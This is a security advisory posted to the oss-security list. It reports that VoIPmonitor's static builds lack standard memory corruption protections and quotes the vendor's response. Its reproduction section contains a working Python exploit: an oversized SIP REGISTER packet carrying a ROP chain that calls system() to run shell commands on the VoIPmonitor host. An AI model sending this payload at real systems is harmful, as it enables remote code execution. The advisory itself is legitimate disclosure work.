'[oss-security] =?UTF-8?Q?ES2021-04:_VoIPmonitor_static_builds_are_compiled_without_any_?= =?UTF-8?Q?'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] =?UTF-8?Q?ES2021-04:_VoIPmonitor_static_builds_are_compiled_without_any_?= =?UTF-8?Q?
From:       "Sandro Gauci" <sandro () enablesecurity ! com>
Date:       2021-03-15 12:50:26
Message-ID: e835517e-f199-4cae-a9cb-33c89a77c916 () www ! fastmail ! com
[Download RAW message or body]

# VoIPmonitor static builds are compiled without any standard memory corruption protection

- Fixed versions: N/A
- Enable Security Advisory: \
https://github.com/EnableSecurity/advisories/tree/master/ES2021-04-voipmonitor-staticbuild-memory-corruption-protection
                
- VoIPmonitor Security Advisory: none
- Tested vulnerable versions: 27.5
- Timeline:
    - Report date: 2021-02-10 & 2021-02-13
	- Enable Security advisory: 2021-03-15

## Description

The binaries available for download at <https://www.voipmonitor.org/download> are built without \
any memory corruption protection in place. The following is output from the tool \
`hardening-check`:

```
hardening-check voipmonitor:
 Position Independent Executable: no, normal executable!
 Stack protected: no, not found!
 Fortify Source functions: unknown, no protectable libc functions used
 Read-only relocations: no, not found!
 Immediate binding: no, not found!
 Stack clash protection: unknown, no -fstack-clash-protection instructions found
 Control flow integrity: unknown, no -fcf-protection instructions found!
```

When stack protection together with Fortify Source and other protection mechanisms are in \
place, exploitation of memory corruption vulnerabilities normally results in a program crash \
instead of leading to remote code execution. Most modern compilation systems create executable \
binaries with these features built-in by default. When these features are not used, attackers \
may easily exploit memory corruption vulnerabilities, such as buffer overflows, to run \
arbitrary code. In this advisory we will demonstrate how a buffer overflow reported in a \
separate advisory, could be abused to run arbitrary code because of the lack of standard memory \
corruption protection in the static build releases of VoIPmonitor.

The vendor has explained that:

> we are not going to enable the protection in the static builds as the speed is critical on \
> many installations

> Our static build also uses tcmalloc (recommended version) which is required for high \
> packet/second processing as the libc allocator is not fast enough especially on NUMA systems. \
> For high packet/second traffic FORTIFY_SOURCE can introduce a lot of additional CPU cycles. \
> If using custom builds with FORTIFY_SOURCE - they should compare if the sniffer did not \
> introduced higher CPU usage.

While we understand the vendor's position, we are issuing an advisory to ensure that end users \
can make informed risk-based decisions.

## Impact

The lack of standard memory corruption protection mechanisms means that such vulnerabilities \
may lead to remote code execution.

## How to reproduce the issue

1. Execute the static build of VoIPmonitor (such as \
https://www.voipmonitor.org/current-stable-sniffer-static-64bit.tar.gz) 2. Start the live \
sniffer from the VOIPMonitor GUI or via the manager on port 5029 3. Execute the following \
Python program so that VOIPMonitor is able to capture the packet 4. Observe the payload being \
                executed by the `voipmonitor` process, i.e. the following:
    - current user is printed due to execution of the `whoami` command
    - `h4x0r was here` is also printed
    - a file has been created in `/tmp/woot`

```python
import struct
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

payload_size=32607
# Pad with As
payload = b'A' * 703
payload_size-=len(payload)

# Write system payload
cmd=b'whoami;echo "h4x0r was here";touch /tmp/woot\x00'
payload+=cmd
payload_size-=len(cmd)

# Pad some more so that we can overwrite the save_packet_sql's function return address
payload += b'A' * payload_size

# Call a ROP gadged that increments the value of the RDI register, 
# which will now point to the value set by cmd
payload += struct.pack('<Q', 0x0000000000b222f1)

# Return to system() to execute the value in RDI
payload += struct.pack('<Q', 0xb22fd0)

# Return to exit() to exit gracefully
payload += struct.pack('<Q', 0xf60a20)

msg=b'REGISTER %s SIP/2.0\r\n' % (payload)
msg+=b'Via: SIP/2.0/UDP 192.168.1.132:35393;rport;branch=z9hG4bK-kwtTkrdNAO2Wvw0v\r\n'
msg+=b'Max-Forwards: 70\r\n'
msg+=b'From: <sip:85861710@demo.sipvicious.pro>;tag=mnq1nKGNZHNUkNOG\r\n'
msg+=b'To: <sip:85861710@demo.sipvicious.pro>\r\n'
msg+=b'Call-ID: 93X9dNZO2qdcfpdu\r\n'
msg+=b'CSeq: 1 REGISTER\r\n'
msg+=b'Contact: <sip:85861710@192.168.1.132:35393;transport=udp>\r\n'
msg+=b'Expires: 60\r\n'
msg+=b'Content-Length: 0\r\n'
msg+=b'\r\n'
s.sendto(msg, ('167.71.58.84', 5060))

```

## Solution and recommendations

Users who would like to have standard memory corruption protection for VoIPmonitor should \
compile the binaries themselves and apply their own upgrades rather than using the upgrade \
feature from the VoIPmonitor GUI / sensors page.

We recommended the following to the vendor:

> Our recommendation is that standard memory corruption protection be switched on by default in \
> the official binary build of VoIPmonitor. If there are specific requirements for specific \
> systems that require such features to be switched off, then additional binaries should be \
> offered, with adequate documentation of the risks involved.

> Do note that memory corruption vulnerabilities should also be addressed and fixed even if \
> security features, such as Fortify, are used.

## Acknowledgements

Enable Security would like to thank Martin Vit and the developers at VoIPmonitor for the very \
quick responses and explanations with regards to this security issue.

## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and \
provides quality penetration testing to help protect your real-time communications systems \
against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on \
currently available information. Use of the information constitutes acceptance for use in an AS \
IS condition. There are no warranties with regard to this information. Neither the author nor \
the publisher accepts any liability for any direct, indirect, or consequential loss or damage \
arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found \
at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.


--
 
    Sandro Gauci, CEO at Enable Security GmbH

    Register of Companies:       AG Charlottenburg HRB 173016 B
    Company HQ:                       Neuburger Straße 101 b, 94036 Passau, Germany
    PGP/Encrypted comms:       https://keybase.io/sandrogauci
    Our blog:                                https://www.rtcsec.com
    Other points of contact:       https://enablesecurity.com/#contact-us


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic